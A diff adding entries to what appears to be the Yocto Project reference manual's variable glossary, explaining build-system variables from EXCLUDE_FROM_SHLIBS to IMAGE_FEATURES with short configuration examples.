+   :term:`EXCLUDE_FROM_SHLIBS`
+      Triggers the OpenEmbedded build system's shared libraries resolver to
+      exclude an entire package when scanning for shared libraries.
+
+      .. note::
+
+         The shared libraries resolver's functionality results in part from
+         the internal function ``package_do_shlibs``, which is part of the
+         :ref:`ref-tasks-package` task. You should be aware that the shared
+         libraries resolver might implicitly define some dependencies between
+         packages.
+
+      The ``EXCLUDE_FROM_SHLIBS`` variable is similar to the
+      :term:`PRIVATE_LIBS` variable, which excludes a
+      package's particular libraries only and not the whole package.
+
+      Use the ``EXCLUDE_FROM_SHLIBS`` variable by setting it to "1" for a
+      particular package:
+      ::
+
+         EXCLUDE_FROM_SHLIBS = "1"
+
+   :term:`EXCLUDE_FROM_WORLD`
+      Directs BitBake to exclude a recipe from world builds (i.e.
+      ``bitbake world``). During world builds, BitBake locates, parses and
+      builds all recipes found in every layer exposed in the
+      ``bblayers.conf`` configuration file.
+
+      To exclude a recipe from a world build using this variable, set the
+      variable to "1" in the recipe.
+
+      .. note::
+
+         Recipes added to ``EXCLUDE_FROM_WORLD`` may still be built during a
+         world build in order to satisfy dependencies of other recipes. Adding
+         a recipe to ``EXCLUDE_FROM_WORLD`` only ensures that the recipe is not
+         explicitly added to the list of build targets in a world build.
+
+   :term:`EXTENDPE`
+      Used with file and pathnames to create a prefix for a recipe's
+      version based on the recipe's :term:`PE` value. If ``PE``
+      is set and greater than zero for a recipe, ``EXTENDPE`` becomes that
+      value (e.g if ``PE`` is equal to "1" then ``EXTENDPE`` becomes "1").
+      If a recipe's ``PE`` is not set (the default) or is equal to zero,
+      ``EXTENDPE`` becomes "".
+
+      See the :term:`STAMP` variable for an example.
+
+   :term:`EXTENDPKGV`
+      The full package version specification as it appears on the final
+      packages produced by a recipe. The variable's value is normally used
+      to fix a runtime dependency to the exact same version of another
+      package in the same recipe:
+      ::
+
+         RDEPENDS_${PN}-additional-module = "${PN} (= ${EXTENDPKGV})"
+
+      The dependency relationships are intended to force the package
+      manager to upgrade these types of packages in lock-step.
+
+   :term:`EXTERNAL_KERNEL_TOOLS`
+      When set, the ``EXTERNAL_KERNEL_TOOLS`` variable indicates that these
+      tools are not in the source tree.
+
+      When kernel tools are available in the tree, they are preferred over
+      any externally installed tools. Setting the ``EXTERNAL_KERNEL_TOOLS``
+      variable tells the OpenEmbedded build system to prefer the installed
+      external tools. See the
+      :ref:`kernel-yocto <ref-classes-kernel-yocto>` class in
+      ``meta/classes`` to see how the variable is used.
+
+   :term:`EXTERNALSRC`
+      When inheriting the :ref:`externalsrc <ref-classes-externalsrc>`
+      class, this variable points to the source tree, which is outside of
+      the OpenEmbedded build system. When set, this variable sets the
+      :term:`S` variable, which is what the OpenEmbedded build
+      system uses to locate unpacked recipe source code.
+
+      For more information on ``externalsrc.bbclass``, see the
+      ":ref:`externalsrc.bbclass <ref-classes-externalsrc>`" section. You
+      can also find information on how to use this variable in the
+      ":ref:`dev-manual/dev-manual-common-tasks:building software from an external source`"
+      section in the Yocto Project Development Tasks Manual.
+
+   :term:`EXTERNALSRC_BUILD`
+      When inheriting the :ref:`externalsrc <ref-classes-externalsrc>`
+      class, this variable points to the directory in which the recipe's
+      source code is built, which is outside of the OpenEmbedded build
+      system. When set, this variable sets the :term:`B` variable,
+      which is what the OpenEmbedded build system uses to locate the Build
+      Directory.
+
+      For more information on ``externalsrc.bbclass``, see the
+      ":ref:`externalsrc.bbclass <ref-classes-externalsrc>`" section. You
+      can also find information on how to use this variable in the
+      ":ref:`dev-manual/dev-manual-common-tasks:building software from an external source`"
+      section in the Yocto Project Development Tasks Manual.
+
+   :term:`EXTRA_AUTORECONF`
+      For recipes inheriting the :ref:`autotools <ref-classes-autotools>`
+      class, you can use ``EXTRA_AUTORECONF`` to specify extra options to
+      pass to the ``autoreconf`` command that is executed during the
+      :ref:`ref-tasks-configure` task.
+
+      The default value is "--exclude=autopoint".
+
+   :term:`EXTRA_IMAGE_FEATURES`
+      A list of additional features to include in an image. When listing
+      more than one feature, separate them with a space.
+
+      Typically, you configure this variable in your ``local.conf`` file,
+      which is found in the :term:`Build Directory`.
+      Although you can use this variable from within a recipe, best
+      practices dictate that you do not.
+
+      .. note::
+
+         To enable primary features from within the image recipe, use the
+         :term:`IMAGE_FEATURES` variable.
+
+      Here are some examples of features you can add:
+
+        - "dbg-pkgs" - Adds -dbg packages for all installed packages including
+          symbol information for debugging and profiling.
+
+        - "debug-tweaks" - Makes an image suitable for debugging. For example, allows root logins without passwords and
+          enables post-installation logging. See the 'allow-empty-password' and
+          'post-install-logging' features in the ":ref:`ref-features-image`"
+          section for more information.
+        - "dev-pkgs" - Adds -dev packages for all installed packages. This is
+          useful if you want to develop against the libraries in the image.
+        - "read-only-rootfs" - Creates an image whose root filesystem is
+          read-only. See the
+          ":ref:`dev-manual/dev-manual-common-tasks:creating a read-only root filesystem`"
+          section in the Yocto Project Development Tasks Manual for more
+          information
+        - "tools-debug" - Adds debugging tools such as gdb and strace.
+        - "tools-sdk" - Adds development tools such as gcc, make,
+          pkgconfig and so forth.
+        - "tools-testapps" - Adds useful testing tools
+          such as ts_print, aplay, arecord and so forth.
+
+      For a complete list of image features that ships with the Yocto
+      Project, see the ":ref:`ref-features-image`" section.
+
+      For an example that shows how to customize your image by using this
+      variable, see the ":ref:`usingpoky-extend-customimage-imagefeatures`"
+      section in the Yocto Project Development Tasks Manual.
+
+   :term:`EXTRA_IMAGECMD`
+      Specifies additional options for the image creation command that has
+      been specified in :term:`IMAGE_CMD`. When setting
+      this variable, use an override for the associated image type. Here is
+      an example:
+      ::
+
+         EXTRA_IMAGECMD_ext3 ?= "-i 4096"
+
+   :term:`EXTRA_IMAGEDEPENDS`
+      A list of recipes to build that do not provide packages for
+      installing into the root filesystem.
+
+      Sometimes a recipe is required to build the final image but is not
+      needed in the root filesystem. You can use the ``EXTRA_IMAGEDEPENDS``
+      variable to list these recipes and thus specify the dependencies. A
+      typical example is a required bootloader in a machine configuration.
+
+      .. note::
+
+         To add packages to the root filesystem, see the various
+         \*:term:`RDEPENDS` and \*:term:`RRECOMMENDS` variables.
+
+   :term:`EXTRANATIVEPATH`
+      A list of subdirectories of
+      ``${``\ :term:`STAGING_BINDIR_NATIVE`\ ``}``
+      added to the beginning of the environment variable ``PATH``. As an
+      example, the following prepends
+      "${STAGING_BINDIR_NATIVE}/foo:${STAGING_BINDIR_NATIVE}/bar:" to
+      ``PATH``:
+      ::
+
+         EXTRANATIVEPATH = "foo bar"
+
+   :term:`EXTRA_OECMAKE`
+      Additional `CMake <https://cmake.org/overview/>`__ options. See the
+      :ref:`cmake <ref-classes-cmake>` class for additional information.
+
+   :term:`EXTRA_OECONF`
+      Additional ``configure`` script options. See
+      :term:`PACKAGECONFIG_CONFARGS` for
+      additional information on passing configure script options.
+
+   :term:`EXTRA_OEMAKE`
+      Additional GNU ``make`` options.
+
+      Because the ``EXTRA_OEMAKE`` defaults to "", you need to set the
+      variable to specify any required GNU options.
+
+      :term:`PARALLEL_MAKE` and
+      :term:`PARALLEL_MAKEINST` also make use of
+      ``EXTRA_OEMAKE`` to pass the required flags.
+
+   :term:`EXTRA_OESCONS`
+      When inheriting the :ref:`scons <ref-classes-scons>` class, this
+      variable specifies additional configuration options you want to pass
+      to the ``scons`` command line.
+
+   :term:`EXTRA_USERS_PARAMS`
+      When inheriting the :ref:`extrausers <ref-classes-extrausers>`
+      class, this variable provides image level user and group operations.
+      This is a more global method of providing user and group
+      configuration as compared to using the
+      :ref:`useradd <ref-classes-useradd>` class, which ties user and
+      group configurations to a specific recipe.
+
+      The set list of commands you can configure using the
+      ``EXTRA_USERS_PARAMS`` is shown in the ``extrausers`` class. These
+      commands map to the normal Unix commands of the same names:
+      ::
+
+         # EXTRA_USERS_PARAMS = "\
+         # useradd -p '' tester; \
+         # groupadd developers; \
+         # userdel nobody; \
+         # groupdel -g video; \
+         # groupmod -g 1020 developers; \
+         # usermod -s /bin/sh tester; \
+         # "
+
+   :term:`FEATURE_PACKAGES`
+      Defines one or more packages to include in an image when a specific
+      item is included in :term:`IMAGE_FEATURES`.
+      When setting the value, ``FEATURE_PACKAGES`` should have the name of
+      the feature item as an override. Here is an example:
+      ::
+
+         FEATURE_PACKAGES_widget = "package1 package2"
+
+      In this example, if "widget" were added to ``IMAGE_FEATURES``,
+      package1 and package2 would be included in the image.
+
+      .. note::
+
+         Packages installed by features defined through ``FEATURE_PACKAGES``
+         are often package groups. While similarly named, you should not
+         confuse the ``FEATURE_PACKAGES`` variable with package groups, which
+         are discussed elsewhere in the documentation.
+
+   :term:`FEED_DEPLOYDIR_BASE_URI`
+      Points to the base URL of the server and location within the
+      document-root that provides the metadata and packages required by
+      OPKG to support runtime package management of IPK packages. You set
+      this variable in your ``local.conf`` file.
+
+      Consider the following example:
+      ::
+
+         FEED_DEPLOYDIR_BASE_URI = "http://192.168.7.1/BOARD-dir"
+
+      This example assumes you are serving
+      your packages over HTTP and your databases are located in a directory
+      named ``BOARD-dir``, which is underneath your HTTP server's
+      document-root. In this case, the OpenEmbedded build system generates
+      a set of configuration files for you in your target that work with
+      the feed.
+
+   :term:`FILES`
+      The list of files and directories that are placed in a package. The
+      :term:`PACKAGES` variable lists the packages
+      generated by a recipe.
+
+      To use the ``FILES`` variable, provide a package name override that
+      identifies the resulting package. Then, provide a space-separated
+      list of files or paths that identify the files you want included as
+      part of the resulting package. Here is an example:
+      ::
+
+         FILES_${PN} += "${bindir}/mydir1 ${bindir}/mydir2/myfile"
+
+      .. note::
+
+         -  When specifying files or paths, you can pattern match using
+            Python's
+            `glob <https://docs.python.org/3/library/glob.html>`_
+            syntax. For details on the syntax, see the documentation by
+            following the previous link.
+
+         -  When specifying paths as part of the ``FILES`` variable, it is
+            good practice to use appropriate path variables. For example,
+            use ``${sysconfdir}`` rather than ``/etc``, or ``${bindir}``
+            rather than ``/usr/bin``. You can find a list of these
+            variables at the top of the ``meta/conf/bitbake.conf`` file in
+            the :term:`Source Directory`. You will also
+            find the default values of the various ``FILES_*`` variables in
+            this file.
+
+      If some of the files you provide with the ``FILES`` variable are
+      editable and you know they should not be overwritten during the
+      package update process by the Package Management System (PMS), you
+      can identify these files so that the PMS will not overwrite them. See
+      the :term:`CONFFILES` variable for information on
+      how to identify these files to the PMS.
+
+   :term:`FILES_SOLIBSDEV`
+      Defines the file specification to match
+      :term:`SOLIBSDEV`. In other words,
+      ``FILES_SOLIBSDEV`` defines the full path name of the development
+      symbolic link (symlink) for shared libraries on the target platform.
+
+      The following statement from the ``bitbake.conf`` shows how it is
+      set:
+      ::
+
+         FILES_SOLIBSDEV ?= "${base_libdir}/lib*${SOLIBSDEV} ${libdir}/lib*${SOLIBSDEV}"
+
+   :term:`FILESEXTRAPATHS`
+      Extends the search path the OpenEmbedded build system uses when
+      looking for files and patches as it processes recipes and append
+      files. The default directories BitBake uses when it processes recipes
+      are initially defined by the :term:`FILESPATH`
+      variable. You can extend ``FILESPATH`` variable by using
+      ``FILESEXTRAPATHS``.
+
+      Best practices dictate that you accomplish this by using
+      ``FILESEXTRAPATHS`` from within a ``.bbappend`` file and that you
+      prepend paths as follows:
+      ::
+
+         FILESEXTRAPATHS_prepend := "${THISDIR}/${PN}:"
+
+      In the above example, the build system first
+      looks for files in a directory that has the same name as the
+      corresponding append file.
+
+      .. note::
+
+         When extending ``FILESEXTRAPATHS``, be sure to use the immediate
+         expansion (``:=``) operator. Immediate expansion makes sure that
+         BitBake evaluates :term:`THISDIR` at the time the
+         directive is encountered rather than at some later time when
+         expansion might result in a directory that does not contain the
+         files you need.
+
+         Also, include the trailing separating colon character if you are
+         prepending. The trailing colon character is necessary because you
+         are directing BitBake to extend the path by prepending directories
+         to the search path.
+
+      Here is another common use:
+      ::
+
+         FILESEXTRAPATHS_prepend := "${THISDIR}/files:"
+
+      In this example, the build system extends the
+      ``FILESPATH`` variable to include a directory named ``files`` that is
+      in the same directory as the corresponding append file.
+
+      This next example specifically adds three paths:
+      ::
+
+         FILESEXTRAPATHS_prepend := "path_1:path_2:path_3:"
+
+      A final example shows how you can extend the search path and include
+      a :term:`MACHINE`-specific override, which is useful
+      in a BSP layer:
+      ::
+
+          FILESEXTRAPATHS_prepend_intel-x86-common := "${THISDIR}/${PN}:"
+
+      The previous statement appears in the
+      ``linux-yocto-dev.bbappend`` file, which is found in the
+      :ref:`overview-manual/overview-manual-development-environment:yocto project source repositories` in
+      ``meta-intel/common/recipes-kernel/linux``. Here, the machine
+      override is a special :term:`PACKAGE_ARCH`
+      definition for multiple ``meta-intel`` machines.
+
+      .. note::
+
+         For a layer that supports a single BSP, the override could just be
+         the value of ``MACHINE``.
+
+      By prepending paths in ``.bbappend`` files, you allow multiple append
+      files that reside in different layers but are used for the same
+      recipe to correctly extend the path.
+
+   :term:`FILESOVERRIDES`
+      A subset of :term:`OVERRIDES` used by the
+      OpenEmbedded build system for creating
+      :term:`FILESPATH`. The ``FILESOVERRIDES`` variable
+      uses overrides to automatically extend the
+      :term:`FILESPATH` variable. For an example of how
+      that works, see the :term:`FILESPATH` variable
+      description. Additionally, you find more information on how overrides
+      are handled in the
+      ":ref:`bitbake:bitbake-user-manual/bitbake-user-manual-metadata:conditional syntax (overrides)`"
+      section of the BitBake User Manual.
+
+      By default, the ``FILESOVERRIDES`` variable is defined as:
+      ::
+
+         FILESOVERRIDES = "${TRANSLATED_TARGET_ARCH}:${MACHINEOVERRIDES}:${DISTROOVERRIDES}"
+
+      .. note::
+
+         Do not hand-edit the ``FILESOVERRIDES`` variable. The values match up
+         with expected overrides and are used in an expected manner by the
+         build system.
+
+   :term:`FILESPATH`
+      The default set of directories the OpenEmbedded build system uses
+      when searching for patches and files.
+
+      During the build process, BitBake searches each directory in
+      ``FILESPATH`` in the specified order when looking for files and
+      patches specified by each ``file://`` URI in a recipe's
+      :term:`SRC_URI` statements.
+
+      The default value for the ``FILESPATH`` variable is defined in the
+      ``base.bbclass`` class found in ``meta/classes`` in the
+      :term:`Source Directory`:
+      ::
+
+         FILESPATH = "${@base_set_filespath(["${FILE_DIRNAME}/${BP}", \
+             "${FILE_DIRNAME}/${BPN}", "${FILE_DIRNAME}/files"], d)}"
+
+      The
+      ``FILESPATH`` variable is automatically extended using the overrides
+      from the :term:`FILESOVERRIDES` variable.
+
+      .. note::
+
+         -  Do not hand-edit the ``FILESPATH`` variable. If you want the
+            build system to look in directories other than the defaults,
+            extend the ``FILESPATH`` variable by using the
+            :term:`FILESEXTRAPATHS` variable.
+
+         -  Be aware that the default ``FILESPATH`` directories do not map
+            to directories in custom layers where append files
+            (``.bbappend``) are used. If you want the build system to find
+            patches or files that reside with your append files, you need
+            to extend the ``FILESPATH`` variable by using the
+            ``FILESEXTRAPATHS`` variable.
+
+      You can take advantage of this searching behavior in useful ways. For
+      example, consider a case where the following directory structure
+      exists for general and machine-specific configurations:
+      ::
+
+         files/defconfig
+         files/MACHINEA/defconfig
+         files/MACHINEB/defconfig
+
+      Also in the example, the ``SRC_URI`` statement contains
+      "file://defconfig". Given this scenario, you can set
+      :term:`MACHINE` to "MACHINEA" and cause the build
+      system to use files from ``files/MACHINEA``. Set ``MACHINE`` to
+      "MACHINEB" and the build system uses files from ``files/MACHINEB``.
+      Finally, for any machine other than "MACHINEA" and "MACHINEB", the
+      build system uses files from ``files/defconfig``.
+
+      You can find out more about the patching process in the
+      ":ref:`patching-dev-environment`" section
+      in the Yocto Project Overview and Concepts Manual and the
+      ":ref:`new-recipe-patching-code`" section in
+      the Yocto Project Development Tasks Manual. See the
+      :ref:`ref-tasks-patch` task as well.
+
+   :term:`FILESYSTEM_PERMS_TABLES`
+      Allows you to define your own file permissions settings table as part
+      of your configuration for the packaging process. For example, suppose
+      you need a consistent set of custom permissions for a set of groups
+      and users across an entire work project. It is best to do this in the
+      packages themselves but this is not always possible.
+
+      By default, the OpenEmbedded build system uses the ``fs-perms.txt``,
+      which is located in the ``meta/files`` folder in the :term:`Source Directory`.
+      If you create your own file
+      permissions setting table, you should place it in your layer or the
+      distro's layer.
+
+      You define the ``FILESYSTEM_PERMS_TABLES`` variable in the
+      ``conf/local.conf`` file, which is found in the :term:`Build Directory`,
+      to point to your custom
+      ``fs-perms.txt``. You can specify more than a single file permissions
+      setting table. The paths you specify to these files must be defined
+      within the :term:`BBPATH` variable.
+
+      For guidance on how to create your own file permissions settings
+      table file, examine the existing ``fs-perms.txt``.
+
+   :term:`FIT_HASH_ALG`
+      Specifies the hash algorithm used in creating the FIT Image. For e.g. sha256.
+
+   :term:`FIT_SIGN_ALG`
+      Specifies the signature algorithm used in creating the FIT Image.
+      For e.g. rsa2048.
+
+   :term:`FONT_EXTRA_RDEPENDS`
+      When inheriting the :ref:`fontcache <ref-classes-fontcache>` class,
+      this variable specifies the runtime dependencies for font packages.
+      By default, the ``FONT_EXTRA_RDEPENDS`` is set to "fontconfig-utils".
+
+   :term:`FONT_PACKAGES`
+      When inheriting the :ref:`fontcache <ref-classes-fontcache>` class,
+      this variable identifies packages containing font files that need to
+      be cached by Fontconfig. By default, the ``fontcache`` class assumes
+      that fonts are in the recipe's main package (i.e.
+      ``${``\ :term:`PN`\ ``}``). Use this variable if fonts you
+      need are in a package other than that main package.
+
+   :term:`FORCE_RO_REMOVE`
+      Forces the removal of the packages listed in ``ROOTFS_RO_UNNEEDED``
+      during the generation of the root filesystem.
+
+      Set the variable to "1" to force the removal of these packages.
+
+   :term:`FULL_OPTIMIZATION`
+      The options to pass in ``TARGET_CFLAGS`` and ``CFLAGS`` when
+      compiling an optimized system. This variable defaults to "-O2 -pipe
+      ${DEBUG_FLAGS}".
+
+   :term:`GCCPIE`
+      Enables Position Independent Executables (PIE) within the GNU C
+      Compiler (GCC). Enabling PIE in the GCC makes Return Oriented
+      Programming (ROP) attacks much more difficult to execute.
+
+      By default the ``security_flags.inc`` file enables PIE by setting the
+      variable as follows:
+      ::
+
+         GCCPIE ?= "--enable-default-pie"
+
+   :term:`GCCVERSION`
+      Specifies the default version of the GNU C Compiler (GCC) used for
+      compilation. By default, ``GCCVERSION`` is set to "8.x" in the
+      ``meta/conf/distro/include/tcmode-default.inc`` include file:
+      ::
+
+         GCCVERSION ?= "8.%"
+
+      You can override this value by setting it in a
+      configuration file such as the ``local.conf``.
+
+   :term:`GDB`
+      The minimal command and arguments to run the GNU Debugger.
+
+   :term:`GITDIR`
+      The directory in which a local copy of a Git repository is stored
+      when it is cloned.
+
+   :term:`GLIBC_GENERATE_LOCALES`
+      Specifies the list of GLIBC locales to generate should you not wish
+      to generate all LIBC locals, which can be time consuming.
+
+      .. note::
+
+         If you specifically remove the locale ``en_US.UTF-8``, you must set
+         :term:`IMAGE_LINGUAS` appropriately.
+
+      You can set ``GLIBC_GENERATE_LOCALES`` in your ``local.conf`` file.
+      By default, all locales are generated.
+      ::
+
+         GLIBC_GENERATE_LOCALES = "en_GB.UTF-8 en_US.UTF-8"
+
+   :term:`GROUPADD_PARAM`
+      When inheriting the :ref:`useradd <ref-classes-useradd>` class,
+      this variable specifies for a package what parameters should be
+      passed to the ``groupadd`` command if you wish to add a group to the
+      system when the package is installed.
+
+      Here is an example from the ``dbus`` recipe:
+      ::
+
+         GROUPADD_PARAM_${PN} = "-r netdev"
+
+      For information on the standard Linux shell command
+      ``groupadd``, see http://linux.die.net/man/8/groupadd.
+
+   :term:`GROUPMEMS_PARAM`
+      When inheriting the :ref:`useradd <ref-classes-useradd>` class,
+      this variable specifies for a package what parameters should be
+      passed to the ``groupmems`` command if you wish to modify the members
+      of a group when the package is installed.
+
+      For information on the standard Linux shell command ``groupmems``,
+      see http://linux.die.net/man/8/groupmems.
+
+   :term:`GRUB_GFXSERIAL`
+      Configures the GNU GRand Unified Bootloader (GRUB) to have graphics
+      and serial in the boot menu. Set this variable to "1" in your
+      ``local.conf`` or distribution configuration file to enable graphics
+      and serial in the menu.
+
+      See the :ref:`grub-efi <ref-classes-grub-efi>` class for more
+      information on how this variable is used.
+
+   :term:`GRUB_OPTS`
+      Additional options to add to the GNU GRand Unified Bootloader (GRUB)
+      configuration. Use a semi-colon character (``;``) to separate
+      multiple options.
+
+      The ``GRUB_OPTS`` variable is optional. See the
+      :ref:`grub-efi <ref-classes-grub-efi>` class for more information
+      on how this variable is used.
+
+   :term:`GRUB_TIMEOUT`
+      Specifies the timeout before executing the default ``LABEL`` in the
+      GNU GRand Unified Bootloader (GRUB).
+
+      The ``GRUB_TIMEOUT`` variable is optional. See the
+      :ref:`grub-efi <ref-classes-grub-efi>` class for more information
+      on how this variable is used.
+
+   :term:`GTKIMMODULES_PACKAGES`
+      When inheriting the
+      :ref:`gtk-immodules-cache <ref-classes-gtk-immodules-cache>` class,
+      this variable specifies the packages that contain the GTK+ input
+      method modules being installed when the modules are in packages other
+      than the main package.
+
+   :term:`HOMEPAGE`
+      Website where more information about the software the recipe is
+      building can be found.
+
+   :term:`HOST_ARCH`
+      The name of the target architecture, which is normally the same as
+      :term:`TARGET_ARCH`. The OpenEmbedded build system
+      supports many architectures. Here is an example list of architectures
+      supported. This list is by no means complete as the architecture is
+      configurable:
+
+      - arm
+      - i586
+      - x86_64
+      - powerpc
+      - powerpc64
+      - mips
+      - mipsel
+
+   :term:`HOST_CC_ARCH`
+      Specifies architecture-specific compiler flags that are passed to the
+      C compiler.
+
+      Default initialization for ``HOST_CC_ARCH`` varies depending on what
+      is being built:
+
+      -  :term:`TARGET_CC_ARCH` when building for the
+         target
+
+      -  :term:`BUILD_CC_ARCH` when building for the build host (i.e.
+         ``-native``)
+
+      -  ``BUILDSDK_CC_ARCH`` when building for an SDK (i.e.
+         ``nativesdk-``)
+
+   :term:`HOST_OS`
+      Specifies the name of the target operating system, which is normally
+      the same as the :term:`TARGET_OS`. The variable can
+      be set to "linux" for ``glibc``-based systems and to "linux-musl" for
+      ``musl``. For ARM/EABI targets, there are also "linux-gnueabi" and
+      "linux-musleabi" values possible.
+
+   :term:`HOST_PREFIX`
+      Specifies the prefix for the cross-compile toolchain. ``HOST_PREFIX``
+      is normally the same as :term:`TARGET_PREFIX`.
+
+   :term:`HOST_SYS`
+      Specifies the system, including the architecture and the operating
+      system, for which the build is occurring in the context of the
+      current recipe.
+
+      The OpenEmbedded build system automatically sets this variable based
+      on :term:`HOST_ARCH`,
+      :term:`HOST_VENDOR`, and
+      :term:`HOST_OS` variables.
+
+      .. note::
+
+         You do not need to set the variable yourself.
+
+      Consider these two examples:
+
+      -  Given a native recipe on a 32-bit x86 machine running Linux, the
+         value is "i686-linux".
+
+      -  Given a recipe being built for a little-endian MIPS target running
+         Linux, the value might be "mipsel-linux".
+
+   :term:`HOSTTOOLS`
+      A space-separated list (filter) of tools on the build host that
+      should be allowed to be called from within build tasks. Using this
+      filter helps reduce the possibility of host contamination. If a tool
+      specified in the value of ``HOSTTOOLS`` is not found on the build
+      host, the OpenEmbedded build system produces an error and the build
+      is not started.
+
+      For additional information, see
+      :term:`HOSTTOOLS_NONFATAL`.
+
+   :term:`HOSTTOOLS_NONFATAL`
+      A space-separated list (filter) of tools on the build host that
+      should be allowed to be called from within build tasks. Using this
+      filter helps reduce the possibility of host contamination. Unlike
+      :term:`HOSTTOOLS`, the OpenEmbedded build system
+      does not produce an error if a tool specified in the value of
+      ``HOSTTOOLS_NONFATAL`` is not found on the build host. Thus, you can
+      use ``HOSTTOOLS_NONFATAL`` to filter optional host tools.
+
+   :term:`HOST_VENDOR`
+      Specifies the name of the vendor. ``HOST_VENDOR`` is normally the
+      same as :term:`TARGET_VENDOR`.
+
+   :term:`ICECC_DISABLED`
+      Disables or enables the ``icecc`` (Icecream) function. For more
+      information on this function and best practices for using this
+      variable, see the ":ref:`icecc.bbclass <ref-classes-icecc>`"
+      section.
+
+      Setting this variable to "1" in your ``local.conf`` disables the
+      function:
+      ::
+
+         ICECC_DISABLED ??= "1"
+
+      To enable the function, set the variable as follows:
+      ::
+
+         ICECC_DISABLED = ""
+
+   :term:`ICECC_ENV_EXEC`
+      Points to the ``icecc-create-env`` script that you provide. This
+      variable is used by the :ref:`icecc <ref-classes-icecc>` class. You
+      set this variable in your ``local.conf`` file.
+
+      If you do not point to a script that you provide, the OpenEmbedded
+      build system uses the default script provided by the
+      ``icecc-create-env.bb`` recipe, which is a modified version and not
+      the one that comes with ``icecc``.
+
+   :term:`ICECC_PARALLEL_MAKE`
+      Extra options passed to the ``make`` command during the
+      :ref:`ref-tasks-compile` task that specify parallel
+      compilation. This variable usually takes the form of "-j x", where x
+      represents the maximum number of parallel threads ``make`` can run.
+
+      .. note::
+
+         The options passed affect builds on all enabled machines on the
+         network, which are machines running the ``iceccd`` daemon.
+
+      If your enabled machines support multiple cores, coming up with the
+      maximum number of parallel threads that gives you the best
+      performance could take some experimentation since machine speed,
+      network lag, available memory, and existing machine loads can all
+      affect build time. Consequently, unlike the
+      :term:`PARALLEL_MAKE` variable, there is no
+      rule-of-thumb for setting ``ICECC_PARALLEL_MAKE`` to achieve optimal
+      performance.
+
+      If you do not set ``ICECC_PARALLEL_MAKE``, the build system does not
+      use it (i.e. the system does not detect and assign the number of
+      cores as is done with ``PARALLEL_MAKE``).
+
+   :term:`ICECC_PATH`
+      The location of the ``icecc`` binary. You can set this variable in
+      your ``local.conf`` file. If your ``local.conf`` file does not define
+      this variable, the :ref:`icecc <ref-classes-icecc>` class attempts
+      to define it by locating ``icecc`` using ``which``.
+
+   :term:`ICECC_USER_CLASS_BL`
+      Identifies user classes that you do not want the Icecream distributed
+      compile support to consider. This variable is used by the
+      :ref:`icecc <ref-classes-icecc>` class. You set this variable in
+      your ``local.conf`` file.
+
+      When you list classes using this variable, you are "blacklisting"
+      them from distributed compilation across remote hosts. Any classes
+      you list will be distributed and compiled locally.
+
+   :term:`ICECC_USER_PACKAGE_BL`
+      Identifies user recipes that you do not want the Icecream distributed
+      compile support to consider. This variable is used by the
+      :ref:`icecc <ref-classes-icecc>` class. You set this variable in
+      your ``local.conf`` file.
+
+      When you list packages using this variable, you are "blacklisting"
+      them from distributed compilation across remote hosts. Any packages
+      you list will be distributed and compiled locally.
+
+   :term:`ICECC_USER_PACKAGE_WL`
+      Identifies user recipes that use an empty
+      :term:`PARALLEL_MAKE` variable that you want to
+      force remote distributed compilation on using the Icecream
+      distributed compile support. This variable is used by the
+      :ref:`icecc <ref-classes-icecc>` class. You set this variable in
+      your ``local.conf`` file.
+
+   :term:`IMAGE_BASENAME`
+      The base name of image output files. This variable defaults to the
+      recipe name (``${``\ :term:`PN`\ ``}``).
+
+   :term:`IMAGE_BOOT_FILES`
+      A space-separated list of files installed into the boot partition
+      when preparing an image using the Wic tool with the
+      ``bootimg-partition`` or ``bootimg-efi`` source plugin. By default,
+      the files are
+      installed under the same name as the source files. To change the
+      installed name, separate it from the original name with a semi-colon
+      (;). Source files need to be located in
+      :term:`DEPLOY_DIR_IMAGE`. Here are two
+      examples:
+      ::
+
+         IMAGE_BOOT_FILES = "u-boot.img uImage;kernel"
+         IMAGE_BOOT_FILES = "u-boot.${UBOOT_SUFFIX} ${KERNEL_IMAGETYPE}"
+
+      Alternatively, source files can be picked up using a glob pattern. In
+      this case, the destination file must have the same name as the base
+      name of the source file path. To install files into a directory
+      within the target location, pass its name after a semi-colon (;).
+      Here are two examples:
+      ::
+
+         IMAGE_BOOT_FILES = "bcm2835-bootfiles/*"
+         IMAGE_BOOT_FILES = "bcm2835-bootfiles/*;boot/"
+
+      The first example
+      installs all files from ``${DEPLOY_DIR_IMAGE}/bcm2835-bootfiles``
+      into the root of the target partition. The second example installs
+      the same files into a ``boot`` directory within the target partition.
+
+      You can find information on how to use the Wic tool in the
+      ":ref:`dev-manual/dev-manual-common-tasks:creating partitioned images using wic`"
+      section of the Yocto Project Development Tasks Manual. Reference
+      material for Wic is located in the
+      ":doc:`../ref-manual/ref-kickstart`" chapter.
+
+   :term:`IMAGE_CLASSES`
+      A list of classes that all images should inherit. You typically use
+      this variable to specify the list of classes that register the
+      different types of images the OpenEmbedded build system creates.
+
+      The default value for ``IMAGE_CLASSES`` is ``image_types``. You can
+      set this variable in your ``local.conf`` or in a distribution
+      configuration file.
+
+      For more information, see ``meta/classes/image_types.bbclass`` in the
+      :term:`Source Directory`.
+
+   :term:`IMAGE_CMD`
+      Specifies the command to create the image file for a specific image
+      type, which corresponds to the value set set in
+      :term:`IMAGE_FSTYPES`, (e.g. ``ext3``,
+      ``btrfs``, and so forth). When setting this variable, you should use
+      an override for the associated type. Here is an example:
+      ::
+
+         IMAGE_CMD_jffs2 = "mkfs.jffs2 --root=${IMAGE_ROOTFS} \
+             --faketime --output=${DEPLOY_DIR_IMAGE}/${IMAGE_NAME}.rootfs.jffs2 \
+             ${EXTRA_IMAGECMD}"
+
+      You typically do not need to set this variable unless you are adding
+      support for a new image type. For more examples on how to set this
+      variable, see the :ref:`image_types <ref-classes-image_types>`
+      class file, which is ``meta/classes/image_types.bbclass``.
+
+   :term:`IMAGE_DEVICE_TABLES`
+      Specifies one or more files that contain custom device tables that
+      are passed to the ``makedevs`` command as part of creating an image.
+      These files list basic device nodes that should be created under
+      ``/dev`` within the image. If ``IMAGE_DEVICE_TABLES`` is not set,
+      ``files/device_table-minimal.txt`` is used, which is located by
+      :term:`BBPATH`. For details on how you should write
+      device table files, see ``meta/files/device_table-minimal.txt`` as an
+      example.
+
+   :term:`IMAGE_FEATURES`
+      The primary list of features to include in an image. Typically, you
+      configure this variable in an image recipe. Although you can use this
+      variable from your ``local.conf`` file, which is found in the
+      :term:`Build Directory`, best practices dictate that you do
+      not.
+
+      .. note::
+
+         To enable extra features from outside the image recipe, use the
+         :term:`EXTRA_IMAGE_FEATURES` variable.
+
+      For a list of image features that ships with the Yocto Project, see
+      the ":ref:`ref-features-image`" section.
+
